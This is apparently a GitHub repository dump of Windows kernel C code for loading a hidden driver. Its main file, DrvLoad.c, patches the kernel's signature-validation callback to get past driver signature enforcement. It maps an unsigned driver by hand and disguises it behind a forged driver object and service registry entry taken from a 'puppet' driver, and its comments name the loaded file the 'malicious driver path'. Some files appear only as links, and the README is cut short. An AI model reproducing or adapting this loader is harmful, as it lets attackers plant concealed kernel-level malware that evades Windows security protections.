├── DriverObject.c ├── DriverObject.h ├── DrvLoad.c ├── DrvLoad.h ├── Head.h ├── Kernel_PDB.cpp ├── Kernel_PDB.h ├── README.md ├── main.c ├── oxygenPdb.h ├── oxygenpdb.lib ├── tools.c └── tools.h /DriverObject.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/2367765883/hidedriver-normal/aa6002645de014bfc506870c6b3308b64cc4acfe/DriverObject.c -------------------------------------------------------------------------------- /DriverObject.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/2367765883/hidedriver-normal/aa6002645de014bfc506870c6b3308b64cc4acfe/DriverObject.h -------------------------------------------------------------------------------- /DrvLoad.c: -------------------------------------------------------------------------------- 1 | #include"Head.h" 2 | #include 3 | 4 | KEVENT WaitWorkItem; 5 | PDRIVER_OBJECT ShellDrv = NULL; 6 | BOOLEAN IsWDF = FALSE; 7 | 8 | 9 | 10 | //关于无签名驱动加载 11 | ULONG64 CIFun = NULL; 12 | PULONG64 Pqword_14040EF40 = NULL; 13 | //获取Nt头 14 | PIMAGE_NT_HEADERS(*RtlImageNtHeader)(PVOID DllBase) = NULL; 15 | 16 | //获取资源第一步 17 | NTSTATUS(*MiGenerateSystemImageNames)(PUNICODE_STRING DriverPath, ULONG64 zero1, ULONG64 zero2, PUNICODE_STRING OutUnicode, PUNICODE_STRING OutUnicode14, PUNICODE_STRING String1) = NULL; 18 | 19 | //获取资源第二步 获取DriverSection _LDR_DATA_TABLE_ENTRY 20 | NTSTATUS(*MiObtainSectionForDriver)(PUNICODE_STRING String1, PUNICODE_STRING DriverPath, ULONG64 zero1, ULONG64 zero2, PULONG64 PDriverSection) = NULL; 21 | 22 | //创建镜像虚拟地址 23 | PUCHAR(*MiGetSystemAddressForImage)(PVOID PSECTION, int zero, int* un) = NULL; 24 | 25 | //映射镜像物理地址 26 | NTSTATUS(*MiMapSystemImage)(PVOID PSECTION, PUCHAR BaseVa) = NULL; 27 | 28 | //get 数据目录地址 29 | PUCHAR(*RtlImageDirectoryEntryToData)(PUCHAR DllBase, ULONG64 one, ULONG64 one1, PULONG32 PSize) = NULL; 30 | 31 | //填充IAT辅助函数 32 | NTSTATUS(*MiSnapThunk)(PUCHAR 
importDllBase, PUCHAR DllBase, PULONG64 PITE, PULONG64 PIATE, ULONG64 zero) = NULL; 33 | 34 | //线程上锁 35 | PKTHREAD(*MmAcquireLoadLock)() = NULL; 36 | 37 | //线程解锁 38 | VOID(*MmReleaseLoadLock)(PKTHREAD thread) = NULL; 39 | 40 | //获取PPTE 41 | ULONG64(*MiFillPteHierarchy)(ULONG64 va, PPTE_HIERARCHY Pout) = NULL; 42 | 43 | //需要调用这个函数,R3才能成功 CreateFile 44 | VOID(*IopReadyDeviceObjects)(PDRIVER_OBJECT DrvObj) = NULL; 45 | 46 | //驱动入口 47 | NTSTATUS(*ShellDriverEntry)(PVOID a, PVOID b) = NULL; 48 | 49 | //Other 50 | 51 | 52 | ULONG64 SectionOffset = NULL; 53 | PLIST_ENTRY64 PsLoadedModuleList = NULL; 54 | ULONG64 BaseDllNameOffset = NULL; 55 | ULONG64 DllBaseOffset = NULL; 56 | ULONG64 SizeOfImageOffset = NULL; 57 | ULONG64 FlagsOffset = NULL; 58 | 59 | 60 | //---------------------- 61 | 62 | PULONG64 PIoDriverObjectType = NULL; 63 | 64 | //资源锁参数 65 | ULONG64 PIopDriverLoadResource = NULL; 66 | 67 | //默认MajorFunction 68 | ULONG64 PIopInvalidDeviceRequest = NULL; 69 | 70 | //创建对象 71 | NTSTATUS(*ObCreateObjectEx)(BOOLEAN AccMode, ULONG64 Type, POBJECT_ATTRIBUTES attributes, ULONG64 zero, PULONG64 Out, ULONG64 Size, ULONG64 zero1, ULONG64 zero2, PVOID PObject, ULONG64 zero3) = NULL; 72 | 73 | //加入对象表 74 | NTSTATUS(*ObInsertObjectEx)(PVOID PObject, ULONG64 zero, ULONG64 one, ULONG64 zero1, ULONG64 zero2, ULONG64 zero3, PHANDLE PHandle) = NULL; 75 | 76 | //重新构造DriverSection并插入链表 77 | NTSTATUS(*MiConstructLoaderEntry)(PLDR_DATA_TABLE_ENTRY DriverSection, 78 | PUNICODE_STRING DrvName,//"XXX.sys" 79 | PUNICODE_STRING DrvPath,// 80 | ULONG64 zero, 81 | ULONG64 one, 82 | PVOID PnewDriverSection) = NULL; 83 | 84 | ULONG64 PCmRegistryMachineHardwareDescriptionSystemName = NULL; 85 | 86 | 87 | EXTERN_C_START 88 | 89 | //调用ShellDriverEntry跳板 90 | NTSTATUS Shim(PShellContext PSContext) { 91 | NTSTATUS s = STATUS_SUCCESS; 92 | ShellDriverEntry(PSContext->DrvObj, PSContext->PSTR); 93 | KeSetEvent(&WaitWorkItem, 0, FALSE); 94 | return s; 95 | 96 | } 97 | 98 | //通过驱动名字获取基址 99 | PUCHAR 
GetDllBase(PUCHAR PDllName) { 100 | ANSI_STRING DllNameA; 101 | UNICODE_STRING DllNameU = { 0 }; 102 | RtlInitAnsiString(&DllNameA, PDllName); 103 | RtlAnsiStringToUnicodeString(&DllNameU, &DllNameA, TRUE); 104 | PLIST_ENTRY64 PDriverSection = PsLoadedModuleList->Blink; 105 | 106 | PUCHAR PDriverSectionByte = NULL; 107 | PUCHAR ReturnBase = NULL; 108 | PUNICODE_STRING BaseDllName = NULL; 109 | while (PDriverSection != PsLoadedModuleList) { 110 | PDriverSectionByte = (PUCHAR)PDriverSection; 111 | BaseDllName = (PUNICODE_STRING)(PDriverSectionByte + BaseDllNameOffset); 112 | if (RtlEqualUnicodeString(BaseDllName, &DllNameU, TRUE)) { 113 | ReturnBase = *((PULONG64)(PDriverSectionByte + DllBaseOffset)); 114 | break; 115 | } 116 | else { 117 | PDriverSection = PDriverSection->Blink; 118 | } 119 | } 120 | RtlFreeUnicodeString(&DllNameU); 121 | return ReturnBase; 122 | } 123 | 124 | //设置页面可写 125 | VOID SetWrite(ULONG64 va) { 126 | PPT_ENTRY_4KB ppte = NULL; 127 | PTE_HIERARCHY context = { 0 }; 128 | ULONG64 a = *(PULONG64)va; 129 | MiFillPteHierarchy(va, &context); 130 | ppte = context.pte; 131 | ppte->Fields.Write = 1; 132 | 133 | } 134 | 135 | ULONG64 WdfR0() { 136 | return 0; 137 | } 138 | 139 | 140 | PVOID 141 | ImageDirectoryEntryToData( 142 | PVOID BaseAddress, 143 | BOOLEAN MappedAsImage, 144 | USHORT DirectoryEntry, 145 | PULONG Size 146 | ) 147 | { 148 | PIMAGE_DOS_HEADER dosHeader; 149 | PIMAGE_NT_HEADERS ntHeaders; 150 | PIMAGE_DATA_DIRECTORY dataDirectory; 151 | PVOID directoryEntryData; 152 | ULONG entrySize; 153 | 154 | // 检查基地址是否有效 155 | if (BaseAddress == NULL) { 156 | if (Size) *Size = 0; 157 | return NULL; 158 | } 159 | 160 | // 获取 DOS 头 161 | dosHeader = (PIMAGE_DOS_HEADER)BaseAddress; 162 | // 检查 DOS 头的签名是否为 IMAGE_DOS_SIGNATURE 163 | if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { 164 | if (Size) *Size = 0; 165 | return NULL; 166 | } 167 | 168 | // 获取 NT 头 169 | ntHeaders = (PIMAGE_NT_HEADERS)((PUCHAR)BaseAddress + dosHeader->e_lfanew); 170 | // 检查 NT 
头的签名是否为 IMAGE_NT_SIGNATURE 171 | if (ntHeaders->Signature != IMAGE_NT_SIGNATURE) { 172 | if (Size) *Size = 0; 173 | return NULL; 174 | } 175 | 176 | // 检查目录条目索引是否在有效范围内 177 | if (DirectoryEntry >= ntHeaders->OptionalHeader.NumberOfRvaAndSizes) { 178 | if (Size) *Size = 0; 179 | return NULL; 180 | } 181 | 182 | // 获取指定目录条目的数据目录 183 | dataDirectory = &ntHeaders->OptionalHeader.DataDirectory[DirectoryEntry]; 184 | entrySize = dataDirectory->Size; 185 | 186 | // 如果请求了目录条目的大小,则返回 187 | if (Size) *Size = entrySize; 188 | 189 | // 如果数据目录的虚拟地址为 0,返回 NULL 190 | if (dataDirectory->VirtualAddress == 0) { 191 | return NULL; 192 | } 193 | 194 | // 计算目录条目数据的地址 195 | directoryEntryData = (PVOID)((PUCHAR)BaseAddress + dataDirectory->VirtualAddress); 196 | 197 | // 如果映射为图像,直接返回计算出的数据地址 198 | if (MappedAsImage) { 199 | return directoryEntryData; 200 | } 201 | else { 202 | // 如果文件没有映射为图像,可能需要根据文件映射方式进行调整 203 | // 这里的调整取决于文件的映射方式,可能需要根据具体情况进行处理 204 | return directoryEntryData; 205 | } 206 | } 207 | 208 | 209 | 210 | //填充IAT 211 | BOOLEAN MakeIAT(PUCHAR DllBase) { 212 | PMyIID Piid = NULL; 213 | PUCHAR ImportDllBase = NULL; 214 | ULONG32 ImportSize = 0; 215 | PUCHAR PDllName = NULL; 216 | //DbgBreakPoint(); 217 | PUCHAR ImportVirtualAddress = ImageDirectoryEntryToData(DllBase, 1, 1, &ImportSize); 218 | int iidSize = sizeof(MyIID); 219 | 220 | PULONG64 PThisIATEOffset = 0; 221 | PULONG64 PThisITEOffset = 0; 222 | NTSTATUS status = STATUS_SUCCESS; 223 | Piid = (PMyIID)ImportVirtualAddress; 224 | for (int i = 0; i < ImportSize; i += iidSize) { 225 | if (Piid->d == 0) 226 | break;//全部填充完成 227 | PDllName = (PUCHAR)(DllBase + Piid->d); 228 | if (0 == memcmp(PDllName, WDF, 10)) {//WDF 需要修复 229 | IsWDF = TRUE; 230 | PThisIATEOffset = DllBase + Piid->e; 231 | while (*PThisIATEOffset != 0) { 232 | //SetWrite(PThisIATEOffset); 233 | PVOID64 pMemory = NULL; 234 | PVOID64 pMdl = IoAllocateMdl(PThisIATEOffset, 8, FALSE, FALSE, NULL); 235 | MmBuildMdlForNonPagedPool(pMdl); 236 | pMemory = 
MmMapLockedPages(pMdl, KernelMode); 237 | *(PULONG64)pMemory = WdfR0; 238 | MmUnmapLockedPages(pMemory, pMdl); 239 | IoFreeMdl(pMdl); 240 | 241 | PThisIATEOffset++; 242 | } 243 | Piid++; 244 | continue; 245 | } 246 | ImportDllBase = GetDllBase(PDllName);//get ImportDllBase 247 | PThisIATEOffset = DllBase + Piid->e; 248 | PThisITEOffset = DllBase + Piid->a; 249 | while (*PThisIATEOffset != 0 && *PThisITEOffset != 0) { 250 | PVOID64 pMemory = NULL; 251 | PVOID64 pMdl = IoAllocateMdl(PThisIATEOffset, 8, FALSE, FALSE, NULL); 252 | MmBuildMdlForNonPagedPool(pMdl); 253 | pMemory = MmMapLockedPages(pMdl, KernelMode); 254 | status = MiSnapThunk(ImportDllBase, DllBase, PThisITEOffset, pMemory, 0); 255 | MmUnmapLockedPages(pMemory, pMdl); 256 | IoFreeMdl(pMdl); 257 | 258 | if (status != STATUS_SUCCESS) { 259 | DbgPrint("error!\n"); 260 | return FALSE; 261 | } 262 | PThisITEOffset++; 263 | PThisIATEOffset++; 264 | } 265 | Piid++; 266 | } 267 | return TRUE; 268 | } 269 | 270 | //禁用签名强制性回调 271 | ULONG64 MySeValidateImageHeader() { 272 | return 0; 273 | } 274 | 275 | struct _WDF_BIND_INFO { 276 | ULONG32 Szie; 277 | UCHAR RZ[4]; 278 | ULONG64 Component; 279 | UCHAR Version[0xc]; 280 | ULONG32 FuncCount; 281 | ULONG64 FuncTable; 282 | ULONG64 Module; 283 | }; 284 | //加载隐藏驱动 285 | VOID LoadDrv(PWCHAR DrvPath) { 286 | 287 | int un = 0; 288 | PUCHAR PDriverSection = NULL; 289 | PUCHAR Section = NULL; 290 | PUCHAR DllBase = NULL; 291 | UNICODE_STRING Path; 292 | UNICODE_STRING Out; 293 | UNICODE_STRING Out14[14]; 294 | UNICODE_STRING String1; 295 | PKTHREAD thread = NULL; 296 | KIRQL OldIrql = 0; 297 | 298 | //初始化事件 299 | KeInitializeEvent(&WaitWorkItem, SynchronizationEvent, FALSE); 300 | 301 | //禁用驱动签名强制 如果需要加载的驱动有签名,就不需要这一部分了,因为容易蓝屏 302 | CIFun = *Pqword_14040EF40; 303 | DbgPrint("PSeValidateImageHeader here %p\n", Pqword_14040EF40); 304 | *Pqword_14040EF40 = MySeValidateImageHeader; 305 | //映射驱动 306 | RtlInitUnicodeString(&Path, DrvPath); 307 | NTSTATUS s0 = 
MiGenerateSystemImageNames(&Path, 0, 0, &Out, Out14, &String1); 308 | thread = MmAcquireLoadLock(); 309 | NTSTATUS s1 = MiObtainSectionForDriver(&String1, &Path, 0, 0, &PDriverSection); 310 | MmReleaseLoadLock(thread); 311 | if (s1 != STATUS_SUCCESS) { 312 | DbgPrint("error code:%X\n", s1); 313 | return; 314 | } 315 | Section = *(PULONG64)(PDriverSection + SectionOffset); 316 | DllBase = MiGetSystemAddressForImage(Section, 0, &un); 317 | KeRaiseIrql(1, &OldIrql); 318 | NTSTATUS s2 = MiMapSystemImage(Section, DllBase); 319 | KeLowerIrql(OldIrql); 320 | //恢复驱动签名强制 如果需要加载的驱动有签名,就不需要这一部分了,因为容易蓝屏 321 | *Pqword_14040EF40 = CIFun; 322 | 323 | //获取DriverEntry 324 | PIMAGE_NT_HEADERS Head = RtlImageNtHeader(DllBase); 325 | PUCHAR Headd = (PUCHAR)Head; 326 | int* p = NULL; 327 | p = Headd + 0x10;//IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint 328 | PULONG64 c = &ShellDriverEntry; 329 | *c = DllBase + *p; 330 | 331 | 332 | //修复IAT 333 | if (!MakeIAT(DllBase)) { 334 | return; 335 | } 336 | 337 | 338 | //修复_security_cookie 339 | int size = 0; 340 | PULONG64 ConfigAdd = 0; 341 | PULONG64 P_security_cookieAddress = NULL; 342 | ConfigAdd = RtlImageDirectoryEntryToData(DllBase, 1, 0xA, &size); 343 | 344 | if (!ConfigAdd) 345 | { 346 | DbgPrintEx(77, 0, "请编译源码的时候启用安全检查 (/GS)!\n"); 347 | 348 | return FALSE; 349 | } 350 | 351 | P_security_cookieAddress = ConfigAdd[0xb]; 352 | //SetWrite(P_security_cookieAddress); 353 | //PVOID64 pMemory = NULL; 354 | //PVOID64 pMdl = IoAllocateMdl(P_security_cookieAddress, 4, FALSE, FALSE, NULL); 355 | //MmBuildMdlForNonPagedPool(pMdl); 356 | //pMemory = MmMapLockedPages(pMdl, KernelMode); 357 | *P_security_cookieAddress = 1;//随意更改,但是一定要改 358 | //MmUnmapLockedPages(pMemory, pMdl); 359 | //IoFreeMdl(pMdl); 360 | 361 | //修复WDF(仅WDF需要修复,WDM无视) 362 | struct _WDF_BIND_INFO* PWdfBindInfo = ((ULONG64)P_security_cookieAddress) + 0x10; 363 | PULONG64 PWdfFunctions = PWdfBindInfo->FuncTable; 364 | PULONG64 PWdfDriverGlobals = NULL; 365 | if (IsWDF == 
TRUE) { 366 | *PWdfFunctions = (ULONG64)ExAllocatePool(NonPagedPool, 0x1000); 367 | if ((*PWdfFunctions) == NULL) { 368 | return; 369 | } 370 | memset(*PWdfFunctions, 0, 0x1000); 371 | PWdfDriverGlobals = ((ULONG64)PWdfFunctions) + 8; 372 | *PWdfDriverGlobals = ExAllocatePool(NonPagedPool, 0x100); 373 | if (*PWdfDriverGlobals == NULL) { 374 | ExFreePool(*PWdfFunctions); 375 | return; 376 | }memset(*PWdfDriverGlobals, 0, 0x100); 377 | } 378 | 379 | //driverEntry 380 | DbgPrint("DllBase:%p\n", DllBase); 381 | ShellContext SContext = { 0 }; 382 | SContext.DrvObj = FindNotDeviceDriver(); 383 | ULONG64 OldDriverUnLoad = SContext.DrvObj->DriverUnload;//备份一下DriverUnLoad 384 | WORK_QUEUE_ITEM WorkItem = { 0 }; 385 | WorkItem.WorkerRoutine = Shim; 386 | WorkItem.Parameter = &SContext; 387 | WorkItem.List.Flink = 0i64; 388 | ExQueueWorkItem(&WorkItem, DelayedWorkQueue); 389 | //等一下 390 | KeWaitForSingleObject(&WaitWorkItem, Executive, KernelMode, FALSE, NULL); 391 | 392 | //还原DriverUnLoad 393 | SContext.DrvObj->DriverUnload = OldDriverUnLoad; 394 | 395 | //提交劫持设备 396 | IopReadyDeviceObjects(SContext.DrvObj); 397 | 398 | //释放 399 | if (IsWDF == TRUE) { 400 | ExFreePool(*PWdfFunctions); 401 | ExFreePool(*PWdfDriverGlobals); 402 | *PWdfFunctions = 0; 403 | *PWdfDriverGlobals = 0; 404 | } 405 | 406 | } 407 | 408 | //-------------------------------------------驱动伪装 409 | //创建注册表项 返回对应注册表句柄 410 | HANDLE CreateRegistry(PWCHAR ODrvPath, PWCHAR ServiceName) { 411 | NTSTATUS status = STATUS_SUCCESS; 412 | OBJECT_ATTRIBUTES objAttrs = { 0 }; 413 | UNICODE_STRING SerRegistryPath = { 0 }, SerName = { 0 }, RegUnicodeString = { 0 }; 414 | HANDLE hReg = NULL; 415 | ULONG64 Out = 0; 416 | UNICODE_STRING ImagePathUn = { 0 }, DisplayNameUn = { 0 }, ErrorControlUn = { 0 }, StartUn = { 0 }, TypeUn = { 0 }; 417 | RtlInitUnicodeString(&DisplayNameUn, L"DisplayName"); 418 | RtlInitUnicodeString(&ImagePathUn, L"ImagePath"); 419 | RtlInitUnicodeString(&ErrorControlUn, L"ErrorControl"); 420 | 
RtlInitUnicodeString(&StartUn, L"Start"); 421 | RtlInitUnicodeString(&TypeUn, L"Type"); 422 | ULONG64 EC = 1, Str = 3, Typ = 1; 423 | RtlInitUnicodeString(&SerRegistryPath, ServiceRegistryPath); 424 | RtlInitUnicodeString(&SerName, ServiceName); 425 | RegUnicodeString.Buffer = ExAllocatePool(NonPagedPool, (ULONG64)SerRegistryPath.MaximumLength + (ULONG64)SerName.MaximumLength); 426 | if (RegUnicodeString.Buffer == NULL) { 427 | return 0; 428 | } 429 | //DbgBreakPoint(); 430 | memset(RegUnicodeString.Buffer, 0, (ULONG64)SerRegistryPath.MaximumLength + (ULONG64)SerName.MaximumLength); 431 | memcpy(RegUnicodeString.Buffer, SerRegistryPath.Buffer, SerRegistryPath.Length); 432 | memcpy(&RegUnicodeString.Buffer[SerRegistryPath.Length / 2], SerName.Buffer, SerName.Length); 433 | RegUnicodeString.MaximumLength = SerRegistryPath.MaximumLength + SerName.MaximumLength; 434 | RegUnicodeString.Length = SerRegistryPath.Length + SerName.Length; 435 | InitializeObjectAttributes(&objAttrs, &RegUnicodeString, OBJ_CASE_INSENSITIVE, NULL, NULL); 436 | status = ZwCreateKey(&hReg, KEY_ALL_ACCESS, &objAttrs, 0, NULL, REG_OPTION_VOLATILE, &Out); 437 | status = ZwSetValueKey(hReg, &ImagePathUn, NULL, REG_EXPAND_SZ, ODrvPath, 2 * wcslen(ODrvPath)); 438 | status = ZwSetValueKey(hReg, &DisplayNameUn, NULL, REG_SZ, ServiceName, 2 * wcslen(ServiceName)); 439 | status = ZwSetValueKey(hReg, &ErrorControlUn, NULL, REG_DWORD, &EC, 4); 440 | status = ZwSetValueKey(hReg, &StartUn, NULL, REG_DWORD, &Str, 4); 441 | status = ZwSetValueKey(hReg, &TypeUn, NULL, REG_DWORD, &Typ, 4); 442 | return hReg; 443 | } 444 | 445 | //ADrvPath 恶意驱动路径: 例如:L"\\??\\C:\\Users\\52pojie\\Desktop\\A.sys" 446 | //ODrvPath 傀儡驱动路径: 例如:L"\\??\\C:\\Users\\52pojie\\Desktop\\T.sys" 447 | //ServiceName 傀儡服务名: 例如:L"xixi" 448 | BOOLEAN CamouflageDrvLoad(PWCHAR ADrvPath, PWCHAR ODrvPath, PWCHAR ServiceName) { 449 | NTSTATUS status = STATUS_SUCCESS; 450 | PDRIVER_OBJECT PTDrvObj = NULL; 451 | ULONG64 Out = 0; 452 | WCHAR 
ServiceNameBuffer[0x50] = { 0 }; 453 | HANDLE HRegistry = NULL; 454 | 455 | //映射、修复IAT 456 | int un = 0; 457 | PUCHAR PADriverSection = NULL; 458 | PLDR_DATA_TABLE_ENTRY PODriverSection = NULL; 459 | PLDR_DATA_TABLE_ENTRY NewPODriverSection = NULL; 460 | //这三个都是ADrv的信息 461 | PUCHAR Section = NULL; 462 | PUCHAR DllBase = NULL; 463 | ULONG32 DllSize = 0; 464 | 465 | UNICODE_STRING ADrvPathUn; 466 | UNICODE_STRING ODrvPathUn; 467 | //这两个都是ODrv的信息 468 | UNICODE_STRING OutU; 469 | UNICODE_STRING Out14[14]; 470 | 471 | UNICODE_STRING AString; 472 | UNICODE_STRING OString; 473 | PKTHREAD thread = NULL; 474 | 475 | PUCHAR Head = NULL; 476 | 477 | PULONG64 ConfigAdd = 0; 478 | PULONG64 P_security_cookieAddress = NULL; 479 | 480 | struct _WDF_BIND_INFO* PWdfBindInfo = NULL; 481 | PULONG64 PWdfFunctions = NULL; 482 | PULONG64 PWdfDriverGlobals = NULL; 483 | 484 | HANDLE DrvH = NULL; 485 | OBJECT_ATTRIBUTES att = { 0 }; 486 | UNICODE_STRING ObjectName = { 0 }; 487 | 488 | PUNICODE_STRING PSTR = NULL; 489 | ULONG NtQueryObjReturnLen = 0; 490 | ShellContext DEContext = { 0 }; 491 | WORK_QUEUE_ITEM WorkItem = { 0 }; 492 | 493 | KIRQL OldIrql = 0; 494 | //创建服务注册表 495 | HRegistry = CreateRegistry(ODrvPath, ServiceName); 496 | //DbgBreakPoint(); 497 | try { 498 | //上锁 499 | ExAcquireResourceExclusiveLite(PIopDriverLoadResource, 1); 500 | //禁用驱动签名强制 如果需要加载的驱动有签名,就不需要这一部分了,因为容易蓝屏 501 | /* CIFun = *Pqword_14040EF40; 502 | DbgPrintEx(77, 0, "PSeValidateImageHeader here %p\n", Pqword_14040EF40); 503 | *Pqword_14040EF40 = MySeValidateImageHeader;*/ 504 | 505 | //映射驱动 506 | RtlInitUnicodeString(&ADrvPathUn, ADrvPath); 507 | status = MiGenerateSystemImageNames(&ADrvPathUn, 0, 0, &OutU, Out14, &AString); 508 | //OUT : UN"已签名.sys" 509 | //Out14[0] : UN"Path前缀" Out14[3] : UN"\Driver\" 510 | //String1 同 Path 511 | RtlInitUnicodeString(&ODrvPathUn, ODrvPath); 512 | status = MiGenerateSystemImageNames(&ODrvPathUn, 0, 0, &OutU, Out14, &OString); 513 | 514 | //DbgBreakPoint(); 515 | 
//创建DriverSection 516 | thread = MmAcquireLoadLock(); 517 | status = MiObtainSectionForDriver(&AString, &ADrvPathUn, 0, 0, &PADriverSection); 518 | status = MiObtainSectionForDriver(&OString, &ODrvPathUn, 0, 0, &PODriverSection); 519 | MmReleaseLoadLock(thread); 520 | 521 | 522 | 523 | //映射ADrv,不映射ODrv 524 | Section = *(PULONG64)(PADriverSection + SectionOffset);//改了这 525 | DllBase = MiGetSystemAddressForImage(Section, 0, &un); 526 | 527 | KeRaiseIrql(1, &OldIrql); 528 | NTSTATUS s2 = MiMapSystemImage(Section, DllBase); 529 | KeLowerIrql(OldIrql); 530 | 531 | //恢复驱动签名强制 如果需要加载的驱动有签名,就不需要这一部分了,因为容易蓝屏 532 | //*Pqword_14040EF40 = CIFun; 533 | Head = RtlImageNtHeader(DllBase); 534 | DllSize = *(PULONG32)(Head + 0x50); 535 | 536 | //提交DriverSection 537 | PODriverSection->SizeOfImage = DllSize; 538 | PODriverSection->DllBase = DllBase; 539 | status = MiConstructLoaderEntry(PODriverSection, &OutU, &OString, 0, 1, &NewPODriverSection); 540 | ExFreePoolWithTag(PODriverSection, 0); 541 | ExFreePoolWithTag(PADriverSection, 0); 542 | NewPODriverSection->Flags = 0x49104000; 543 | //flag 0x49104000 544 | 545 | 546 | //修复IAT 547 | MakeIAT(DllBase); 548 | 549 | 550 | //修复_security_cookie 551 | int size = 0; 552 | ConfigAdd = ImageDirectoryEntryToData(DllBase, 1, 0xA, &size); 553 | 554 | if (!ConfigAdd) 555 | { 556 | DbgPrintEx(77, 0, "请编译源码的时候启用安全检查 (/GS)!\n"); 557 | 558 | return FALSE; 559 | } 560 | 561 | 562 | P_security_cookieAddress = ConfigAdd[0xb]; 563 | //SetWrite(P_security_cookieAddress, 1); 564 | //PVOID64 pMemory = NULL; 565 | //PVOID64 pMdl = IoAllocateMdl(P_security_cookieAddress, 8, FALSE, FALSE, NULL); 566 | //MmBuildMdlForNonPagedPool(pMdl); 567 | //pMemory = MmMapLockedPages(pMdl, KernelMode); 568 | *P_security_cookieAddress = 1; 569 | //MmUnmapLockedPages(pMemory, pMdl); 570 | //IoFreeMdl(pMdl); 571 | //SetWrite(P_security_cookieAddress, 0); 572 | 573 | //修复WDF 574 | if (IsWDF == TRUE) { 575 | PWdfBindInfo = ((ULONG64)P_security_cookieAddress) + 0x10; 576 | 
PWdfFunctions = PWdfBindInfo->FuncTable; 577 | //SetWrite(P_security_cookieAddress, 1); 578 | *PWdfFunctions = (ULONG64)ExAllocatePool(NonPagedPool, 0x1000); 579 | //SetWrite(P_security_cookieAddress, 0); 580 | if ((*PWdfFunctions) == NULL) { 581 | return FALSE; 582 | } 583 | memset(*PWdfFunctions, 0, 0x1000); 584 | PWdfDriverGlobals = ((ULONG64)PWdfFunctions) + 8; 585 | //SetWrite(P_security_cookieAddress, 1); 586 | *PWdfDriverGlobals = ExAllocatePool(NonPagedPool, 0x100); 587 | //SetWrite(P_security_cookieAddress, 0); 588 | if (*PWdfDriverGlobals == NULL) { 589 | ExFreePool(*PWdfFunctions); 590 | return FALSE; 591 | }memset(*PWdfDriverGlobals, 0, 0x100); 592 | } 593 | 594 | 595 | DbgPrintEx(77, 0, "DllBase:%p\n", DllBase); 596 | 597 | 598 | //构造DriverObject并插入 599 | memcpy(ServiceNameBuffer, DrvObjNamePrefix, 2 * wcslen(DrvObjNamePrefix)); 600 | memcpy(&ServiceNameBuffer[wcslen(DrvObjNamePrefix)], ServiceName, 2 * wcslen(ServiceName)); 601 | RtlInitUnicodeString(&ObjectName, ServiceNameBuffer); 602 | att.Length = 0x30; att.Attributes = 0x250; att.ObjectName = &ObjectName; 603 | status = ObCreateObjectEx(0, *PIoDriverObjectType, &att, 0, &Out, 0x1A0, 0, 0, &PTDrvObj, 0); 604 | if (status != STATUS_SUCCESS) { 605 | return status; 606 | } 607 | memset(PTDrvObj, 0, 0x1a0); 608 | PTDrvObj->DriverExtension = &PTDrvObj[1]; 609 | *(PULONG64)(&PTDrvObj[1]) = &PTDrvObj[0]; 610 | for (int i = 0; i <= IRP_MJ_MAXIMUM_FUNCTION; i++) { 611 | PTDrvObj->MajorFunction[i] = PIopInvalidDeviceRequest; 612 | } 613 | PTDrvObj->Type = 4; PTDrvObj->Size = 0x150; 614 | PTDrvObj->DriverInit = NewPODriverSection->EntryPoint; 615 | PTDrvObj->DriverSection = NewPODriverSection; 616 | PTDrvObj->DriverStart = DllBase; 617 | PTDrvObj->DriverSize = DllSize; 618 | PTDrvObj->Flags |= 2; 619 | //DbgBreakPoint(); 620 | status = ObInsertObjectEx(PTDrvObj, 0, 1, 0, 0, 0, &DrvH); 621 | ExReleaseResourceLite(PIopDriverLoadResource);//解锁 622 | status = ObReferenceObjectByHandle(DrvH, 0, 
*PIoDriverObjectType, 0, &PTDrvObj, NULL); 623 | ZwClose(DrvH); 624 | PTDrvObj->HardwareDatabase = PCmRegistryMachineHardwareDescriptionSystemName; 625 | PTDrvObj->DriverName.Buffer = ExAllocatePool(NonPagedPool, ObjectName.MaximumLength); 626 | PTDrvObj->DriverName.Length = ObjectName.Length; 627 | PTDrvObj->DriverName.MaximumLength = ObjectName.MaximumLength; 628 | if (PTDrvObj->DriverName.Buffer == NULL) { 629 | return FALSE; 630 | } 631 | memcpy(PTDrvObj->DriverName.Buffer, ObjectName.Buffer, ObjectName.MaximumLength); 632 | 633 | //DriverEntry 634 | PSTR = ExAllocatePool(NonPagedPool, 0x1000); 635 | status = ZwQueryObject(HRegistry, 1, PSTR, 0x1000, &NtQueryObjReturnLen); 636 | DEContext.DrvObj = PTDrvObj; 637 | DEContext.PSTR = PSTR; 638 | KeInitializeEvent(&WaitWorkItem, SynchronizationEvent, FALSE); 639 | PULONG64 SetDriverEntry = &ShellDriverEntry; 640 | *SetDriverEntry = PTDrvObj->DriverInit; 641 | WorkItem.WorkerRoutine = Shim; 642 | WorkItem.Parameter = &DEContext; 643 | WorkItem.List.Flink = 0i64; 644 | ExQueueWorkItem(&WorkItem, DelayedWorkQueue); 645 | 646 | KeWaitForSingleObject(&WaitWorkItem, Executive, KernelMode, FALSE, NULL); 647 | //提交设备 648 | IopReadyDeviceObjects(PTDrvObj); 649 | //释放 650 | ExFreePool(PSTR); 651 | ZwClose(HRegistry); 652 | if (IsWDF == TRUE) { 653 | ExFreePool(*PWdfFunctions); 654 | ExFreePool(*PWdfDriverGlobals); 655 | *PWdfFunctions = 0; 656 | *PWdfDriverGlobals = 0; 657 | } 658 | return TRUE; 659 | }except(1) { 660 | return FALSE; 661 | } 662 | } 663 | EXTERN_C_END -------------------------------------------------------------------------------- /DrvLoad.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/2367765883/hidedriver-normal/aa6002645de014bfc506870c6b3308b64cc4acfe/DrvLoad.h -------------------------------------------------------------------------------- /Head.h: -------------------------------------------------------------------------------- 1 | 
#pragma once 2 | #include "Kernel_PDB.h" 3 | #include"DriverObject.h" 4 | #include"DrvLoad.h" -------------------------------------------------------------------------------- /Kernel_PDB.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/2367765883/hidedriver-normal/aa6002645de014bfc506870c6b3308b64cc4acfe/Kernel_PDB.cpp -------------------------------------------------------------------------------- /Kernel_PDB.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/2367765883/hidedriver-normal/aa6002645de014bfc506870c6b3308b64cc4acfe/Kernel_PDB.h -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # hidedriver-normal 2 | 3 | 1.修复了原作者代码中 ImageDirectoryEntryToData 